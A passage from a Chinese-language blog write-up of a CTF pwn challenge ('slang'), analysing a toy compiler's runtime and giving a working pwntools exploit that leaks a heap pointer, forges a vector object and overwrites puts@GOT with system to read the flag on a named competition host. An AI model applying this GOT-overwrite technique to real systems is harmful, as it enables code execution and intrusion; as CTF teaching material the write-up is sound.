*)<span class="built_in">calloc</span>((<span class="type">size_t</span>)n, <span class="keyword">sizeof</span>(<span class="type">int64_t</span>));</span><br><span class="line">    <span class="keyword">if</span> (n != <span class="number">0</span> &amp;&amp; !v-&gt;data) &#123;</span><br><span class="line">        die(<span class="string">&quot;malloc data&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    v-&gt;size = n;</span><br><span class="line">    <span class="keyword">return</span> v;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">int64_t</span> <span class="title function_">vec_load</span><span class="params">(<span class="type">vec_t</span> *v, <span class="type">int64_t</span> idx)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (!v) &#123;</span><br><span class="line">        die(<span class="string">&quot;null vector&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (idx &lt; <span class="number">0</span> || idx &gt;= v-&gt;size) &#123;</span><br><span class="line">        die(<span class="string">&quot;vector index out of bounds&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> v-&gt;data[idx];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">vec_store</span><span class="params">(<span class="type">vec_t</span> *v, <span class="type">int64_t</span> idx, <span class="type">int64_t</span> val)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (!v) &#123;</span><br><span class="line">        die(<span class="string">&quot;null vector&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (idx &lt; <span class="number">0</span> || idx &gt;= v-&gt;size) &#123;</span><br><span class="line">        die(<span class="string">&quot;vector index out of bounds&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    v-&gt;data[idx] = val;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">rt_say</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *s)</span> &#123;</span><br><span class="line">    <span class="built_in">puts</span>(s);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">rt_scribble</span><span class="params">(<span class="type">vec_t</span> *v, <span class="type">int64_t</span> idx, <span class="type">int64_t</span> delta)</span> &#123;</span><br><span class="line">    vec_store(v, idx, vec_load(v, idx) + delta);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">rt_keep_int</span><span class="params">(<span class="type">int64_t</span> x)</span> &#123;</span><br><span class="line">    <span class="keyword">asm</span> <span class="title function_">volatile</span><span class="params">(<span class="string">&quot;&quot;</span> : : <span class="string">&quot;r&quot;</span>(x) : <span class="string">&quot;memory&quot;</span>)</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">rt_keep_str</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *s)</span> &#123;</span><br><span class="line">    <span class="keyword">asm</span> <span class="title function_">volatile</span><span class="params">(<span class="string">&quot;&quot;</span> : : <span class="string">&quot;r&quot;</span>(s) : <span class="string">&quot;memory&quot;</span>)</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">rt_keep_vec</span><span class="params">(<span class="type">vec_t</span> *v)</span> &#123;</span><br><span class="line">    <span class="keyword">asm</span> <span class="title function_">volatile</span><span class="params">(<span class="string">&quot;&quot;</span> : : <span class="string">&quot;r&quot;</span>(v) : <span class="string">&quot;memory&quot;</span>)</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span> &#123;</span><br><span class="line">    init_io();</span><br><span class="line">    alarm(<span class="number">20</span>);</span><br><span class="line">    <span class="keyword">return</span> (<span class="type">int</span>)user_main();</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h5 id="对于-runtime-c-的思考"><a href="#对于-runtime-c-的思考" class="headerlink" title="对于 runtime.c 的思考"></a>对于 runtime.c 的思考</h5><p>对于 runtime.c 的漏洞，我们首先需要分析的就是他的数据结构：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">vec_t</span> &#123;</span></span><br><span class="line">    <span class="type">int64_t</span> *data;</span><br><span class="line">    <span class="type">int64_t</span> size;</span><br><span class="line">&#125; <span class="type">vec_t</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>思考一下，根据这个数据结构我们可以有什么漏洞点去挖掘？</p>
<ol>
<li>vec_t 本质上就是指针 + 长度，如果我能伪造一个 vec_t，就能把 data 指向任意地址</li>
<li>如果后面有写接口基于 data[idx] 操作，就可能变成任意写，这是堆 PWN 中常见的操作。</li>
</ol>
<hr>
<p>下一步我们要寻找的就是对外暴露的原语：</p>
<p>简单来讲就是可以 malloc，printf，put，free，以及控制指针等可以利用的函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">vec_t</span> *<span class="title function_">rt_vec_new</span><span class="params">(<span class="type">int64_t</span> n)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (n &lt; <span class="number">0</span> || n &gt; <span class="number">64</span>) &#123;</span><br><span class="line">        die(<span class="string">&quot;bad vector size&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">vec_t</span> *v = (<span class="type">vec_t</span> *)<span class="built_in">malloc</span>(<span class="keyword">sizeof</span>(<span class="type">vec_t</span>));</span><br><span class="line">    <span class="keyword">if</span> (!v) &#123;</span><br><span class="line">        die(<span class="string">&quot;malloc vec&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    v-&gt;data = (<span class="type">int64_t</span> *)<span class="built_in">calloc</span>((<span class="type">size_t</span>)n, <span class="keyword">sizeof</span>(<span class="type">int64_t</span>));</span><br><span class="line">    <span class="keyword">if</span> (n != <span class="number">0</span> &amp;&amp; !v-&gt;data) &#123;</span><br><span class="line">        die(<span class="string">&quot;malloc data&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    v-&gt;size = n;</span><br><span class="line">    <span class="keyword">return</span> v;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">rt_say</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *s)</span> &#123;</span><br><span class="line">    <span class="built_in">puts</span>(s);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">rt_scribble</span><span class="params">(<span class="type">vec_t</span> *v, <span class="type">int64_t</span> idx, <span class="type">int64_t</span> delta)</span> &#123;</span><br><span class="line">    vec_store(v, idx, vec_load(v, idx) + delta);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><code>rt_vec_new</code> 可以申请一个堆对象 vec_t，还会附带一块 data 数组内存</li>
<li><code>rt_say</code>可以利用 puts 去打印内容</li>
<li><code>rt_scribble</code>可以对 v-&gt;data[idx] 做加法写，只要 v 能够伪造，之后就可以利用差值进行<strong>任意地址写</strong>。</li>
</ul>
<hr>
<p>既然我们要伪造 v，那就需要看一看伪造 v 的前提条件：</p>
<p>vec_load &#x2F; vec_store 都会检查：</p>
<ol>
<li>v !&#x3D; NULL</li>
<li>idx &gt;&#x3D; 0</li>
<li>idx &lt; v-&gt;size</li>
</ol>
<p>这里并没有什么需要在意的地方，只是说我们篡改的必须是真实的堆块。</p>
<p>在 runtime 程序当中并没有发现 open&#x2F;read&#x2F;system 等危险函数，这也就意味着我们想要控制程序就必须篡改现有的函数调用，那很明显目标就是 puts 了，初步判断将 puts 表篡改成 system。</p>
<hr>
<h4 id="探测黑盒编译器："><a href="#探测黑盒编译器：" class="headerlink" title="探测黑盒编译器："></a>探测黑盒编译器：</h4><p>对于一个黑盒编译器，我们并不知道他的语法架构，因此我们从一开始一点一点去尝试：</p>
<h5 id="规定-main-函数，返回-int-类型"><a href="#规定-main-函数，返回-int-类型" class="headerlink" title="规定 main 函数，返回 int 类型"></a>规定 main 函数，返回 int 类型</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function main(): -&gt; int &#123;</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>function main：定义函数 main</li>
<li>()：参数列表为空</li>
<li><code>: </code>后面本来是局部变量声明区，<code>: </code>后面直接接 -&gt; int，说明没有局部变量</li>
<li>int：返回类型是 int</li>
</ul>
<p>执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nano test1.slang</span><br><span class="line">./slang test1.slang test1.c</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-002.png"></p>
<h5 id="添加局部变量"><a href="#添加局部变量" class="headerlink" title="添加局部变量"></a>添加局部变量</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function main(): int a -&gt; int &#123;</span><br><span class="line">    a := 0;</span><br><span class="line">    return a;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-003.png"></p>
<h5 id="验证多个局部变量"><a href="#验证多个局部变量" class="headerlink" title="验证多个局部变量"></a>验证多个局部变量</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function main(): int a, int b -&gt; int &#123;</span><br><span class="line">    a := 1;</span><br><span class="line">    b := 2;</span><br><span class="line">    return a;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-004.png"></p>
<p>因此大概可以确定的是：</p>
<p><code>int a，int b</code> -&gt;<code>slot[0] = a  slot[1] = b </code>； </p>
<p><code>a := 1;  b := 2;  return a;</code> -&gt; <code> slot[0] = 1;  slot[1] = 2;  return slot[0];</code></p>
<h5 id="尝试传入参数："><a href="#尝试传入参数：" class="headerlink" title="尝试传入参数："></a>尝试传入参数：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">function add(int x, int y): -&gt; int &#123;</span><br><span class="line">    return x;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function main(): -&gt; int &#123;</span><br><span class="line">    return add(1, 2);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-005.png"></p>
<h5 id="尝试字符串类型："><a href="#尝试字符串类型：" class="headerlink" title="尝试字符串类型："></a>尝试字符串类型：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function main(): str s -&gt; int &#123;</span><br><span class="line">    s := &quot;hello&quot;;</span><br><span class="line">    say(s);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-006.png"></p>
<p>这里是为了确认 str 类型存在，且字符串字面量用双引号；say 是内建函数且可以输出字符串。</p>
<h5 id="验证-vec-类型以及-vec-new："><a href="#验证-vec-类型以及-vec-new：" class="headerlink" title="验证 vec 类型以及 vec_new："></a>验证 vec 类型以及 vec_new：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function main(): vec v -&gt; int &#123;</span><br><span class="line">    v := vec_new(2);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-007.png"></p>
<p>slot[] 是所有局部变量的统一存储</p>
<p>编译器没有给不同类型单独建变量，而是统一用：<code>uintptr_t slot[n]</code> 来保存所有局部变量。</p>
<p>这意味着：int、str、vec 在编译产物里都只是一个 uintptr_t。</p>
<p>类型系统在源码层面看起来有区分，但在生成的 C 里，本质上全都塞进同一种槽位里。</p>
<p>rt_vec_new 是运行时函数，不是编译器内联出来的</p>
<p><code>slot[0] = ((uintptr_t)rt_vec_new(((int64_t)((uintptr_t)2))));</code>说明：vec_new(2) 实际调用的是 runtime.c 里的 rt_vec_new，返回值是 vec_t *。但编译器又把它强转成了 uintptr_t 存进 slot[0]</p>
<p>所以 v 在 C 里根本不是强类型 vec，只是一个整数槽里放了一个指针值。</p>
<p>于是：</p>
<p>vec 可以被当 int 返回，泄露指针值</p>
<p>int 可以被当 vec 返回，伪造对象指针</p>
<h5 id="验证-scribble："><a href="#验证-scribble：" class="headerlink" title="验证 scribble："></a>验证 scribble：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function main(): vec v -&gt; int &#123;</span><br><span class="line">    v := vec_new(2);</span><br><span class="line">    scribble(v, 0, 1);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-008.png"></p>
<p>由此可以确认 scribble 是合法调用且参数顺序是 (vec, idx, delta)</p>
<h5 id="验证-if"><a href="#验证-if" class="headerlink" title="验证 if"></a>验证 if</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">function main(): int a -&gt; int &#123;</span><br><span class="line">    a := 1;</span><br><span class="line">    if (a &lt; 2) &#123;</span><br><span class="line">      a := 3;</span><br><span class="line">    &#125;</span><br><span class="line">    return a;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-009.png"></p>
<h5 id="黑盒编译器总结："><a href="#黑盒编译器总结：" class="headerlink" title="黑盒编译器总结："></a>黑盒编译器总结：</h5><ol>
<li>slot[] 是所有局部变量的统一存储，vec 可以被当 int 返回，泄露指针值，int 可以被当 vec 返回，伪造对象指针。</li>
<li>scribble、say 是合法函数。</li>
</ol>
<h4 id="EXP-编写："><a href="#EXP-编写：" class="headerlink" title="EXP 编写："></a>EXP 编写：</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">function leak(vec b): int a -&gt; int &#123;</span><br><span class="line">if (a &lt; 0) &#123;</span><br><span class="line">a := 1;</span><br><span class="line">&#125;</span><br><span class="line">return a;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>前面总结到：但 slang 编译器有 bug：<strong>参数 b 和局部变量 a 会共用同一个 slot[0]。</strong></p>
<p>这里 v 是 vec_t *，传进 leak 后存在 slot[0]。由于 if (a &lt; 0) 一般不成立，所以 slot[0] 没被改，最后直接 return slot[0]，所以 return v 的指针值。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">function asvec(int a): vec b -&gt; vec &#123;</span><br><span class="line">  if (a &lt; 0) &#123;</span><br><span class="line">  b := vec_new(1);</span><br><span class="line">  &#125;</span><br><span class="line">  return b;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>同样利用 slot 复用，把一个整数地址当成 vec 指针返回。</p>
<hr>
<p>在本地起 docker 环境：进入到 docker 环境测 got 表地址</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">docker build -t slang-local .</span><br><span class="line">docker run -d --name slang-test -p 19999:9999 slang-local</span><br><span class="line">docker <span class="built_in">exec</span> -it slang-test /bin/sh</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-010.png"></p>
<p>先写一个一定会调用 say 的 .slang，这样生成的 ELF 才会导入 puts：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">cd /home/ctf</span><br><span class="line"></span><br><span class="line">cat &gt; /tmp/probe.slang &lt;&lt; <span class="string">&#x27;EOF&#x27;</span></span><br><span class="line">function main(): <span class="built_in">str</span> s -&gt; <span class="built_in">int</span> &#123;</span><br><span class="line">s := <span class="string">&quot;hello&quot;</span>;</span><br><span class="line">say(s);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line">EOF</span><br></pre></td></tr></table></figure>

<p>先让 slang 编成 C：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./slang /tmp/probe.slang /tmp/probe.c</span><br><span class="line"><span class="built_in">cat</span> /tmp/probe.c</span><br></pre></td></tr></table></figure>

<p>再编成 ELF：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -O0 -Wall -Wextra -no-pie -o /tmp/probe /tmp/probe.c runtime.c</span><br></pre></td></tr></table></figure>

<p>取 PUTS_GOT：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">objdump -R /tmp/probe | grep puts</span><br></pre></td></tr></table></figure>

<p>先确认 libc</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ldd /tmp/probe</span><br></pre></td></tr></table></figure>

<p>一般会看到：<code>libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6</code></p>
<p> 然后查这份 libc 里的符号偏移：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">readelf -s /lib/x86_64-linux-gnu/libc.so.6 | egrep <span class="string">&#x27; puts@@| system@@&#x27;</span></span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-011.png"></p>
<p>所以： SYSTEM_MINUS_PUTS &#x3D; 0x52290 - 0x84420</p>
<pre><code>       PUTS_GOT = 0x404018
</code></pre>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">HOST = <span class="string">&quot;pwn-126d079a6e.adworld.xctf.org.cn&quot;</span></span><br><span class="line">PORT = <span class="number">9999</span></span><br><span class="line">PUTS_GOT = <span class="number">0x404018</span></span><br><span class="line">SYSTEM_MINUS_PUTS = <span class="number">0x52290</span> - <span class="number">0x84420</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>():</span><br><span class="line">    <span class="keyword">if</span> args.REMOTE:</span><br><span class="line">        <span class="keyword">return</span> remote(HOST, PORT, ssl=<span class="literal">True</span>)</span><br><span class="line">    <span class="comment"># 本地：process([&quot;python3&quot;, &quot;/home/ctf/server.py&quot;])</span></span><br><span class="line">    <span class="keyword">return</span> process([<span class="string">&quot;python3&quot;</span>, <span class="string">&quot;/home/ctf/server.py&quot;</span>])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">send</span>(<span class="params">io, src</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;END_OF_SOURCE.&quot;</span>)</span><br><span class="line">    io.send(src.encode() + <span class="string">b&quot;\nEND_OF_SOURCE\n&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">src = <span class="string">f&quot;&quot;&quot;function leak(vec b): int a -&gt; int &#123;&#123;</span></span><br><span class="line"><span class="string">if (a &lt; 0) &#123;&#123;wo</span></span><br><span class="line"><span class="string">a := 1;</span></span><br><span class="line"><span class="string">&#125;&#125;</span></span><br><span class="line"><span class="string">return a;</span></span><br><span class="line"><span class="string">&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">function asvec(int a): vec b -&gt; vec &#123;&#123;</span></span><br><span class="line"><span class="string">if (a &lt; 0) &#123;&#123;</span></span><br><span class="line"><span class="string">b := vec_new(1);</span></span><br><span class="line"><span class="string">&#125;&#125;</span></span><br><span class="line"><span class="string">return b;</span></span><br><span class="line"><span class="string">&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">function main(): int p, int fakep, vec v, vec fake -&gt; int &#123;&#123;</span></span><br><span class="line"><span class="string">v := vec_new(2);</span></span><br><span class="line"><span class="string">p := leak(v);</span></span><br><span class="line"><span class="string">                                           </span></span><br><span class="line"><span class="string">fakep := p + 32;</span></span><br><span class="line"><span class="string">say(&quot;warmup&quot;);</span></span><br><span class="line"><span class="string">scribble(v, 0, <span class="subst">&#123;PUTS_GOT&#125;</span>);</span></span><br><span class="line"><span class="string">scribble(v, 1, 1);</span></span><br><span class="line"><span class="string">fake := asvec(fakep);</span></span><br><span class="line"><span class="string">scribble(fake, 0, <span class="subst">&#123;SYSTEM_MINUS_PUTS&#125;</span>);</span></span><br><span class="line"><span class="string">say(&quot;cat /home/ctf/flag&quot;);</span></span><br><span class="line"><span class="string">return 0;</span></span><br><span class="line"><span class="string">&#125;&#125;&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    io = start()</span><br><span class="line">    send(io, src)</span><br><span class="line">    <span class="built_in">print</span>(io.recvall(timeout=<span class="number">3</span>).decode(<span class="string">&quot;latin1&quot;</span>, errors=<span class="string">&quot;ignore&quot;</span>))</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>由此可以编写出一份.slong 文件：总结一下攻击流程：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">vec_new(2)</span><br><span class="line">  ↓</span><br><span class="line">得到真实 vec</span><br><span class="line">  ↓</span><br><span class="line">leak(v) 把 vec_t* 变成 int</span><br><span class="line">  ↓</span><br><span class="line">p + 32 找到 v-&gt;data</span><br><span class="line">  ↓</span><br><span class="line">把 v-&gt;data 伪造成 fake vec_t</span><br><span class="line">  ↓</span><br><span class="line">fake-&gt;data = puts@GOT</span><br><span class="line">fake-&gt;size = 1</span><br><span class="line">  ↓</span><br><span class="line">scribble(fake, 0, system - puts)</span><br><span class="line">  ↓</span><br><span class="line">puts@GOT 改成 system</span><br><span class="line">  ↓</span><br><span class="line">say(&quot;cat /home/ctf/flag&quot;)</span><br><span class="line">  ↓</span><br><span class="line">system(&quot;cat /home/ctf/flag&quot;)</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-012.png"></p>

    </div>
    <footer class="article-footer">
        <a class="article-category-link" href="/HFTTC.github.io/categories/Notes/" title="Notes" data-aos="zoom-in">Notes</a>

    </footer>
  </div>
    <nav id="article-nav" aria-label="Article navigation" data-aos="fade-up">
      <div class="article-nav-link-wrap left">
          <img data-src="/HFTTC.github.io/images/pwn/covers/ret2usr-smep-kpti-qwb2018-core.jpg" data-sizes="auto" alt="ret2usr_smep绕过_kpti绕过 QWB2018-core" class="lazyload">
        <a href="/HFTTC.github.io/2026/06/19/ret2usr_smep%E7%BB%95%E8%BF%87_kpti%E7%BB%95%E8%BF%87%20QWB2018-core/" aria-label="前一篇: ret2usr_smep绕过_kpti绕过 QWB2018-core" title="前一篇: ret2usr_smep绕过_kpti绕过 QWB2018-core"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
            ret2usr_smep绕过_kpti绕过 QWB2018-core
        </h3>
      </div>
    <div class="article-nav-link-wrap right">
        <img data-src="/HFTTC.github.io/images/pwn/covers/ciscn-2023-strangetalkbot.jpg" data-sizes="auto" alt="[CISCN 2023]StrangeTalkBot" class="lazyload">
      <a href="/HFTTC.github.io/2026/06/09/%5BCISCN%202023%5DStrangeTalkBot/" aria-label="后一篇: [CISCN 2023]StrangeTalkBot"  title="后一篇: [CISCN 2023]StrangeTalkBot"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
          [CISCN 2023]StrangeTalkBot
      </h3>
    </div>
  </nav>

</article>

  <section id="comments" data-aos="fade-up">
    <div class="comment-header">
        
      <h2 class="comment-title">说些什么吧！</h2>
      <div class="comment-selector">
        <div class="comment-selector-wrap">
            <div class="selector-item" data-selector="utterances">
              <span>utterances</span>
            </div>
        </div>
      </div>
    </div>
    <div class="comment-content">
          <div class="comment utterances-comment" data-aos="fade-up"
            id="utterances-comment">
          </div>
    </div>
  </section>


</section>
        </div>
        <footer id="footer" aria-label="Site footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    <div>
      <span class="icon-copyright"></span>
        2020-2026
        <span class="footer-info-sep rotate"></span>
      HFTTC
    </div>
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener nofollow noreferrer" target="_blank">Reimu</a>
      </div>
      <div>
        <span class="icon-brush"></span>
        253.5k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        20:59
      </div>
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
  </div>
</footer>

